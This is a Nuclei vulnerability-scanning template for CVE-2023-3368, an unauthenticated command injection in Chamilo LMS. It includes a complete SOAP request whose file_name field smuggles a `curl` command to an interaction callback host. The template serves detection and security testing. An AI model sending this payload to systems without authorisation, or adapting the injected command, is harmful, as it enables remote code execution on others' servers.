nuclei-templates/http/cves/2023/CVE-2023-3368.yaml

79 lines
3.0 KiB
YAML
Raw Normal View History

id: CVE-2023-3368
info:
name: Chamilo LMS <= v1.11.20 Unauthenticated Command Injection
author: dwisiswant0
severity: critical
description: |
Command injection in `/main/webservices/additional_webservices.php`
in Chamilo LMS <= v1.11.20 allows unauthenticated attackers to obtain
remote code execution via improper neutralisation of special characters.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-3368
- https://starlabs.sg/advisories/23/23-3368/
- https://support.chamilo.org/projects/chamilo-18/wiki/security_issues#Issue-121-2023-07-05-Critical-impact-High-risk-Unauthenticated-Command-Injection-CVE-2023-3368
- https://github.com/chamilo/chamilo-lms/commit/37be9ce7243a30259047dd4517c48ff8b21d657a
- https://https://github.com/chamilo/chamilo-lms/commit/4c69b294f927db62092e01b70ac9bd6e32d5b48b
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-3368
cwe-id: CWE-78
epss-score: 0.76057
epss-percentile: 0.97911
cpe: cpe:2.3:a:chamilo:chamilo:*:*:*:*:*:*:*:*
metadata:
verified: "true"
max-request: 1
vendor: chamilo
product: chamilo
shodan-query: http.component:"Chamilo"
2024-01-14 09:21:50 +00:00
tags: cve2023,cve,chamilo,unauth,cmd,rce
http:
- method: POST
path:
- "{{BaseURL}}/main/webservices/additional_webservices.php"
2023-12-05 09:50:33 +00:00
headers:
Content-Type: application/xml
2023-12-05 09:50:33 +00:00
body: |
<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="{{BaseURL}}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<ns1:wsConvertPpt>
<param0 xsi:type="ns2:Map">
<item>
<key xsi:type="xsd:string">file_data</key>
<value xsi:type="xsd:string"></value>
</item>
<item>
<key xsi:type="xsd:string">file_name</key>
<value xsi:type="xsd:string">$(curl http://{{interactsh-url}}/)</value>
</item>
<item>
<key xsi:type="xsd:string">service_ppt2lp_size</key>
<value xsi:type="xsd:string">720x540</value>
</item>
</param0>
</ns1:wsConvertPpt>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "wsConvertPptResponse"
part: body
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
# digest: 490a004630440220045df4ec7bd54f950a3e0c12515456f864f6b6b0c5157bf1926e6f7a8e0759ef02203aed940f4a3d5004abd9ab1a98f0acba93578c711cb452f66bc908ae41ee4bcc:922c64590222798bb761d5b6d8e72950